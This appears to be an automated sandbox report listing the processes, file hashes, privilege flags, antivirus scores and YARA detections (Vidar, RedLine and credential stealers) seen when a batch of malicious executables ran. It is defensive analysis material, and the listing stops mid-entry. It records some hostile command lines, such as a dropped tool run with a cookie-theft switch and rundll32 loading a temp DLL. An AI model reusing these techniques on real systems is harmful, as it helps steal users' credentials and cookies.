                                                                                                                                                                                      Commandline:'C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe'
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:714240 bytes
                                                                                                                                                                                      MD5 hash:A4663FF564689BA0EFB19D8D82AA044F
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000005.00000002.965244604.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.972549932.0000000000A4A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000005.00000003.718547509.0000000002620000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000005.00000002.984787263.0000000002580000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Show Windows behavior

                                                                                                                                                                                      File Activities

                                                                                                                                                                                      Analysis Process: YX7wpjoMI0vZoMwVbFh9XNIC.exe PID: 4240 Parent PID: 6872

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:19
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe'
                                                                                                                                                                                      Imagebase:0xbf0000
                                                                                                                                                                                      File size:371568 bytes
                                                                                                                                                                                      MD5 hash:643397C445A8CED70CB110E7720C491D
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000006.00000002.754891811.0000000003F75000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.754891811.0000000003F75000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Show Windows behavior

                                                                                                                                                                                      File Activities

                                                                                                                                                                                      Analysis Process: MQ5u6_H0cs9EUXsesfNpGUNc.exe PID: 6588 Parent PID: 6872

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:19
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe'
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:357376 bytes
                                                                                                                                                                                      MD5 hash:DF518E39A56E4EA23D0B2442FFD42AEE
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                      Analysis Process: awTgWtFfNpBsevxQFHzT446w.exe PID: 6300 Parent PID: 6872

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:19
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe'
                                                                                                                                                                                      Imagebase:0x430000
                                                                                                                                                                                      File size:620704 bytes
                                                                                                                                                                                      MD5 hash:F517276868E5C46A449A5F73603B4E6A
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Show Windows behavior

                                                                                                                                                                                      File Activities

                                                                                                                                                                                      Analysis Process: ulVElw2mPS2j3QKCM9gOxM3j.exe PID: 6296 Parent PID: 6872

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:19
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe'
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:790920 bytes
                                                                                                                                                                                      MD5 hash:856CF6ED735093F5FE523F0D99E18424
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                      Show Windows behavior

                                                                                                                                                                                      File Activities

                                                                                                                                                                                      Show Windows behavior

                                                                                                                                                                                      Registry Activities

                                                                                                                                                                                      Analysis Process: Xl5_fidIgZFRU48uwkdfjZGj.exe PID: 4940 Parent PID: 6872

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:20
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe'
                                                                                                                                                                                      Imagebase:0xe40000
                                                                                                                                                                                      File size:696364 bytes
                                                                                                                                                                                      MD5 hash:41C69A7F93FBE7EDC44FD1B09795FA67
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                      Show Windows behavior

                                                                                                                                                                                      File Activities

                                                                                                                                                                                      Analysis Process: oO2a8x5RXTHKygCXkT7syx3J.exe PID: 6716 Parent PID: 6872

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:20
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe'
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:709632 bytes
                                                                                                                                                                                      MD5 hash:3FA93FEB10F08753F207064325EE1274
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.962502810.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.994142610.0000000000ACA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.729200820.0000000002670000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                      Analysis Process: gUlDp5No64Xfcgfbo3IlvG0y.exe PID: 6768 Parent PID: 6872

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:20
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe'
                                                                                                                                                                                      Imagebase:0xc90000
                                                                                                                                                                                      File size:1055000 bytes
                                                                                                                                                                                      MD5 hash:F85B88D232A348BF82B2B553F50DFBB8
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                      Analysis Process: LPBuRcBvc7urPUzoi5RqTFtn.exe PID: 4780 Parent PID: 6872

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:20
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe'
                                                                                                                                                                                      Imagebase:0xbf0000
                                                                                                                                                                                      File size:994816 bytes
                                                                                                                                                                                      MD5 hash:AED57D50123897B0012C35EF5DEC4184
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                                      Analysis Process: M5uLwz0sXvZcR89u_43Nm9v8.exe PID: 1372 Parent PID: 6872

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:21
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe'
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:2431039 bytes
                                                                                                                                                                                      MD5 hash:623C88CC55A2DF1115600910BBE14457
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                                      Analysis Process: conhost.exe PID: 64 Parent PID: 4240

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:20
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff724c50000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                      Analysis Process: BqbASL8ovE3o_gRiKrvwENXN.exe PID: 6248 Parent PID: 6872

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:20
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe'
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:375296 bytes
                                                                                                                                                                                      MD5 hash:663FDF847D6B11308415FF86EBFFC275
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000003.679617471.00000000020C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.840587926.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.753598266.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.946369604.000000000063A000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.766043822.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.762967714.000000000063A000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.739471519.00000000005F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000002.1003205218.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.766714248.00000000005F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.718558359.00000000005F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.759921983.00000000005F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.722503902.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000002.1003466769.00000000005F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.773475326.000000000063A000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.742326442.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.725474792.000000000063A000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000002.1003521614.000000000063A000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.840920801.000000000063A000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.840850532.00000000005F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.744015353.000000000063A000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.921076949.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.705454896.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.767127574.000000000063A000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.933364985.00000000005F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000010.00000000.766966642.00000000005F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                      Analysis Process: conhost.exe PID: 6252 Parent PID: 4940

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:22
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff724c50000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Analysis Process: 5hIw8OebGuR7XztS5WBp_Scm.exe PID: 6424 Parent PID: 6872

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:22
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe'
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:612268 bytes
                                                                                                                                                                                      MD5 hash:E517017DD8609B293C5ADB489BE918FD
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Analysis Process: KyTQCmNmjazMZrvIWzjrSsQG.exe PID: 6476 Parent PID: 6872

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:24
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe'
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:4732456 bytes
                                                                                                                                                                                      MD5 hash:EA57C9A4177B1022EC4D053AF865CBC9
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Analysis Process: gDoWsyv4ZlqhjBKjyfkjR1BY.exe PID: 6616 Parent PID: 6872

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:29
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe'
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:13098974 bytes
                                                                                                                                                                                      MD5 hash:FF5864B23CEF0169322395F961AF31E9
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Analysis Process: YX7wpjoMI0vZoMwVbFh9XNIC.exe PID: 7008 Parent PID: 4240

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:33
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe
                                                                                                                                                                                      Imagebase:0x9e0000
                                                                                                                                                                                      File size:371568 bytes
                                                                                                                                                                                      MD5 hash:643397C445A8CED70CB110E7720C491D
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.963209956.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                      Analysis Process: jfiag3g_gg.exe PID: 6944 Parent PID: 4780

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:38
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:188416 bytes
                                                                                                                                                                                      MD5 hash:7FEE8223D6E4F82D6CD115A28F0B6D58
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Analysis Process: file4.exe PID: 7036 Parent PID: 1372

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:41
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Program Files (x86)\Company\NewProduct\file4.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Program Files (x86)\Company\NewProduct\file4.exe'
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:163840 bytes
                                                                                                                                                                                      MD5 hash:02580709C0E95ABA9FDD1FBDF7C348E9
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000002.735071284.00000000005B0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                      • Detection: 19%, Metadefender, Browse
                                                                                                                                                                                      • Detection: 79%, ReversingLabs

                                                                                                                                                                                      Analysis Process: jooyu.exe PID: 4112 Parent PID: 1372

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:41
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Program Files (x86)\Company\NewProduct\jooyu.exe'
                                                                                                                                                                                      Imagebase:0x390000
                                                                                                                                                                                      File size:994816 bytes
                                                                                                                                                                                      MD5 hash:AED57D50123897B0012C35EF5DEC4184
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                      • Detection: 44%, Metadefender, Browse
                                                                                                                                                                                      • Detection: 90%, ReversingLabs

                                                                                                                                                                                      Analysis Process: NVdpapR9v21C.exe PID: 4768 Parent PID: 6424

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:42
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe'
                                                                                                                                                                                      Imagebase:0x210000
                                                                                                                                                                                      File size:353648 bytes
                                                                                                                                                                                      MD5 hash:BB4FD26AB95CB6D7EB25F95AC1F3C2DA
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                                                                                                      Analysis Process: Browzar.exe PID: 5616 Parent PID: 6424

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:49
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Program Files (x86)\Browzar\Browzar.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Program Files (x86)\Browzar\Browzar.exe'
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:228000 bytes
                                                                                                                                                                                      MD5 hash:847674F996283EB11F244A75F14F69AB
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                      • Detection: 3%, Metadefender, Browse
                                                                                                                                                                                      • Detection: 2%, ReversingLabs

                                                                                                                                                                                      Analysis Process: MQ5u6_H0cs9EUXsesfNpGUNc.exe PID: 6224 Parent PID: 6588

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:51
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe'
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:357376 bytes
                                                                                                                                                                                      MD5 hash:DF518E39A56E4EA23D0B2442FFD42AEE
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Analysis Process: rundll32.exe PID: 4420 Parent PID: 4940

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:52
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Windows\system32\rUNdlL32.eXe' 'C:\Users\user\AppData\Local\Temp\axhub.dll',axhub
                                                                                                                                                                                      Imagebase:0x1250000
                                                                                                                                                                                      File size:61952 bytes
                                                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Analysis Process: jingzhang.exe PID: 6984 Parent PID: 1372

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:54
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:'C:\Program Files (x86)\Company\NewProduct\jingzhang.exe'
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:1123869 bytes
                                                                                                                                                                                      MD5 hash:A4C547CFAC944AD816EDF7C54BB58C5C
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                      • Detection: 29%, Metadefender, Browse
                                                                                                                                                                                      • Detection: 79%, ReversingLabs

                                                                                                                                                                                      Analysis Process: jfiag3g_gg.exe PID: 5048 Parent PID: 4780

                                                                                                                                                                                      General

                                                                                                                                                                                      Start time:22:22:56
                                                                                                                                                                                      Start date:23/06/2021
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                      Imagebase:0x400000
